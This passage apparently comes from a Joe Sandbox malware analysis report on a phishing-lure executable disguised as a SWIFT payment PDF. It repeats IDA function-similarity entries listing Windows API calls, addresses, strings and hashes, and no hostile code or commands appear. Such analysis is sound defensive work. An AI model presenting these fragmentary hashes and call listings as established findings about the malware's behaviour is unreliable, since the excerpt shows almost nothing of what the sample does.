                                                                                                                              • API ID: Variant$Copy$ContainedObject$ClearErrorLast
                                                                                                                              • String ID: AutoIt3GUI$Container
                                                                                                                              • API String ID: 2018493657-3941886329
                                                                                                                              • Opcode ID: 461d754c246835dda3bd395489c4ac70cf72804ddeeba94fe44079accc031b16
                                                                                                                              • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                                                                              • Opcode Fuzzy Hash: 461d754c246835dda3bd395489c4ac70cf72804ddeeba94fe44079accc031b16
                                                                                                                              • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                                                                              APIs
                                                                                                                              • GetProcAddress.KERNEL32(00000001,?), ref: 004543C6
                                                                                                                              • GetProcAddress.KERNEL32(?,AU3_FreeVar), ref: 004543DF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc
                                                                                                                              • String ID: AU3_FreeVar
                                                                                                                              • API String ID: 190572456-771828931
                                                                                                                              • Opcode ID: 426a87fb8e78f2b95cf147bb85864de256e8e5fbc001ea9c6f54d44a903ecc1f
                                                                                                                              • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                                                              • Opcode Fuzzy Hash: 426a87fb8e78f2b95cf147bb85864de256e8e5fbc001ea9c6f54d44a903ecc1f
                                                                                                                              • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                                                              APIs
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000080,00000000,PI,00000001,?,?,00000000,?,0042D7C1,?,0042D7C1,00490D50,?,?,00000000,00000002), ref: 00422373
                                                                                                                              • GetLastError.KERNEL32 ref: 00422391
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharErrorLastMultiWide
                                                                                                                              • String ID: PI
                                                                                                                              • API String ID: 203985260-693334235
                                                                                                                              • Opcode ID: 77a505053532826b6252e66309e83475728e4269b05e0448849bd4dba9a5329f
                                                                                                                              • Instruction ID: f6cfcdd0da1bff07fd8c4de5175f2d601c9d85045a190aa3ed4ed41793fd0dcc
                                                                                                                              • Opcode Fuzzy Hash: 77a505053532826b6252e66309e83475728e4269b05e0448849bd4dba9a5329f
                                                                                                                              • Instruction Fuzzy Hash: 1A41B631700165FFCB20EF68EA809AF3775EB41314B9001ABF9205B291D7BD9D8197BA
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID: '
                                                                                                                              • API String ID: 3850602802-1997036262
                                                                                                                              • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                              • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                                                              • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                              • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                                                              APIs
                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                              • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: IconLoadNotifyShell_String
                                                                                                                              • String ID: Line:
                                                                                                                              • API String ID: 3363329723-1585850449
                                                                                                                              • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                              • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                                              • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                              • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID: Combobox
                                                                                                                              • API String ID: 3850602802-2096851135
                                                                                                                              • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                              • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                                                              • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                              • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                                                              APIs
                                                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LengthMessageSendTextWindow
                                                                                                                              • String ID: edit
                                                                                                                              • API String ID: 2978978980-2167791130
                                                                                                                              • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                              • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                                                              • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                              • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 2783356886-2766056989
                                                                                                                              • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                              • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                                                              • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                              • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: htonsinet_addr
                                                                                                                              • String ID: 255.255.255.255
                                                                                                                              • API String ID: 3832099526-2422070025
                                                                                                                              • Opcode ID: 336bf04b74032a76dffc0b3dec239f3a33009b0f842574d7a0c0b2a9c387c113
                                                                                                                              • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                                                                              • Opcode Fuzzy Hash: 336bf04b74032a76dffc0b3dec239f3a33009b0f842574d7a0c0b2a9c387c113
                                                                                                                              • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                                                              APIs
                                                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InternetOpen
                                                                                                                              • String ID: <local>
                                                                                                                              • API String ID: 2038078732-4266983199
                                                                                                                              • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                              • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                                                              • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                              • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                                                              • wsprintfW.USER32 ref: 0045612A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSendwsprintf
                                                                                                                              • String ID: %d/%02d/%02d
                                                                                                                              • API String ID: 3751067900-328681919
                                                                                                                              • Opcode ID: 2f94ef12d061241edb9979ef4b8dfec1a2b2b476f2643c079f431c0c1a0d2850
                                                                                                                              • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                                                              • Opcode Fuzzy Hash: 2f94ef12d061241edb9979ef4b8dfec1a2b2b476f2643c079f431c0c1a0d2850
                                                                                                                              • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                                                                              APIs
                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                                                              • InternetCloseHandle.WININET ref: 00442668
                                                                                                                                • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                                              • String ID: aeB
                                                                                                                              • API String ID: 857135153-906807131
                                                                                                                              • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                              • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                                                              • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                              • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                                                              APIs
                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                                                              • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                                                • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                              • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                              • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                                                              • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                              • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                                                                              APIs
                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                                                                • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                              • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                              • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                                                              • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                              • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                                                              APIs
                                                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Message
                                                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                                                              • API String ID: 2030045667-4017498283
                                                                                                                              • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                              • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                                                              • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                              • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D